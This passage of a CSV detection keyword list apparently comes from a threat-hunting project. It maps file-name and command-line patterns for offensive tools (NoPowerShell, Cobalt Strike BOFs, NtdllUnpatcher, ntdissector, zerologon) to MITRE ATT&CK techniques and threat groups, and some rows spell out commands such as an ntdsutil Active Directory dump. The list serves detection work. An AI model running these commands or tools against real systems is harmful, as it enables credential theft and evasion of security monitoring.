Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.exe*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.sln*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell/*.cs*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell_trunk.zip*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell32.dll*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell64.dll*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*--no-promiscuous-mode*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*normal/randomized.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*northdata-get-company-names 
*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*noseyparker report --datastore *,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker scan --datastore *,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker summarize --datastore *,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker-cli*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker-main*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential 
Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker-v*-universal-macos*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker-v*-x86_64-unknown-linux-gnu*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*Nosql-Exploitation-Framework*,offensive_tool_keyword,Nosql-Exploitation-Framework,A FrameWork For NoSQL Scanning and Exploitation Framework,T1210 - T1211 - T1021 - T1059,TA0002 - TA0011 - TA0003,N/A,N/A,Frameworks,https://github.com/torque59/Nosql-Exploitation-Framework,1,1,N/A,N/A,6,594,158,2023-09-26T11:50:30Z,2013-12-26T17:46:11Z -*NoSQLMap*,offensive_tool_keyword,NoSQLMap,Automated NoSQL database enumeration and web application exploitation tool.,T1190 - T1210 - T1506,TA0002 - TA0007 - TA0040,N/A,N/A,Frameworks,https://github.com/codingo/NoSQLMap,1,0,N/A,N/A,10,2532,568,2023-09-29T03:29:49Z,2013-09-24T15:01:30Z -*notepad FUZZ*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*notredamecheatstowin>*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter 
Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*novelbfh.zip*,offensive_tool_keyword,novelbfh,Brute force Novell hacking tool -- Circa 1993,T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/classic_hacking_tools,1,1,N/A,N/A,1,2,0,2023-04-16T02:15:42Z,2023-04-16T01:49:12Z -*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*npgimkapccfidfkfoklhpkgmhgfejhbj*,greyware_tool_keyword,BelkaVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nping *,offensive_tool_keyword,nping,Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. 
and more,T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://nmap.org/nping/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*nps whoami*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z
-*nps whoami*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z
-*nps_payload*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.,T1059.007 - T1218.001 - T1027.002,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/trustedsec/nps_payload,1,1,N/A,N/A,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z
-*nps_payload.py*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance,T1027 - T1027.005 - T1055 - T1211,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/trustedsec/nps_payload,1,1,N/A,9,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z
-*nps_payload-master*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance,T1027 - T1027.005 - T1055 - T1211,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/trustedsec/nps_payload,1,1,N/A,9,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z
-*nrf24-scanner.py -l -v*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*nrpc.py*,offensive_tool_keyword,zerologon,Zerologon CVE exploitation,T1210 - T1072,TA0008,N/A,N/A,Exploitation tools,https://github.com/michaelpoznecki/zerologon,1,0,N/A,N/A,1,9,4,2020-09-15T16:31:59Z,2020-09-15T05:32:24Z
-*nse_install.py*,greyware_tool_keyword,nmap,Install and 
update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z
-*nse-insall-0.0.1*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z
-*nse-install *,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z
-*nse-install-master*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z
-*nselib/data/passwords.lst*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*ntcreatethread.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z
-*ntcreatethread.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z
-*NtCreateUserProcessShellcode*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,,
-*ntdissector -*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS 
database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z
-*ntdissector-main*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,1,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z
-*Ntdll_SusProcess.*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z
-*NTDLLReflection-main*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z
-*NtdllUnpatcher.cpp*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*NtdllUnpatcher.dll*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*NtdllUnpatcher.lib*,offensive_tool_keyword,NtdllUnpatcher,code for EDR 
bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*NtdllUnpatcher.log*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*NtdllUnpatcher.obj*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*NtdllUnpatcher.sln*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*NtdllUnpatcher_Injector*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*NtdllUnpatcher-master*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*ntds/ntds.py*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z
-*ntds_grabber.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ntdsdump.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z
-*NTDSgrab.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ntdsutil *ac i ntds* *create full*\temp*,greyware_tool_keyword,ntdsutil,creating a full backup of the Active Directory database and saving it to the \temp directory,T1003.001 - T1070.004 - T1059,TA0005 - TA0003 - TA0002,N/A,N/A,Credential Access,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*ntdsutil.exe *ac i ntds*ifm*create full *temp*,greyware_tool_keyword,ntdsutil,creating a full backup of the Active Directory database and saving it to the \temp directory,T1003.001 - T1070.004 - T1059,TA0005 - TA0003 - TA0002,N/A,N/A,Credential Access,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*ntfs-read.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Sniffing & Spoofing,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
